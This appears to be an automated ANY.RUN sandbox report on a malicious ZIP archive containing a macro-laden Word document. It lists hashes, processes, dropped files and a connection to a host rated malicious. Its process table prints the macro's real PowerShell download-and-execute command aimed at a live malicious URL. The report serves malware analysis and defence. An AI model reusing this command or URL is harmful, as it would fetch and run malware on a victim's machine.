analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Scan5054603.zip

Full analysis: https://app.any.run/tasks/f36069f7-3ba8-443c-b88d-d572235e4dd9
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 14, 2019, 08:00:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
maldoc-4
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

483BC25F079C52CE0B2F07DCF2610A7B

SHA1:

C1726BD7148DEC08992E8D43BB87786483EC0F8D

SHA256:

6F1A1F991D83F9A3A502013CB21B54BF446A0F2A00DD31843023B97CEB7EA718

SSDEEP:

3072:yOb7kTCMYsocWycwdtQNclQfIkIqWDEcAbmcMG6pMFesZZy:yO8vYsohhwoNcl4bIqWDEcAKc+MFE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2192)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2192)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2764)
    • Creates files in the user directory

      • powershell.exe (PID: 2240)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2192)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:10:14 02:36:00
ZipCRC: 0xd10eb763
ZipCompressedSize: 155666
ZipUncompressedSize: 13631489
ZipFileName: Nuovo_documento_22.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2764"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Scan5054603.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2192"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2764.6307\Nuovo_documento_22.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 421
Read events
1 654
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2764WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2764.6307\Nuovo_documento_22.doc
MD5:
SHA256:
2192WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD1F0.tmp.cvr
MD5:
SHA256:
2240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A9T937UKA423UWMGN2YM.temp
MD5:
SHA256:
2192WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF22D14BFF999E0894.TMP
MD5:
SHA256:
2192WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFA03CD3-2336-439E-8D62-C45CCD9FDBE4}.tmp
MD5:
SHA256:
2192WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{70DBE3C5-8762-4A1D-B087-6E31425E164D}.tmp
MD5:
SHA256:
2192WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CECD04BE12070C625C44EF4B39A4F5CC
SHA256:A578BA2CA1B39D1C25B7288DB702B2B6B2A1D0D1AADBF1AD49F4735BE02E9B7E
2240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39df1f.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2192WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIa2764.6307\~$ovo_documento_22.docpgc
MD5:DFCF6486A836B5C9060D0ACA183B0ABD
SHA256:127252CF015368E545332572EF51EDE63C2C6D7CDE3C570AD53EDBDD596E83D1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2240
powershell.exe
185.189.151.22:80
jes.dhinsuranceservices.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
jes.dhinsuranceservices.com
  • 185.189.151.22
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info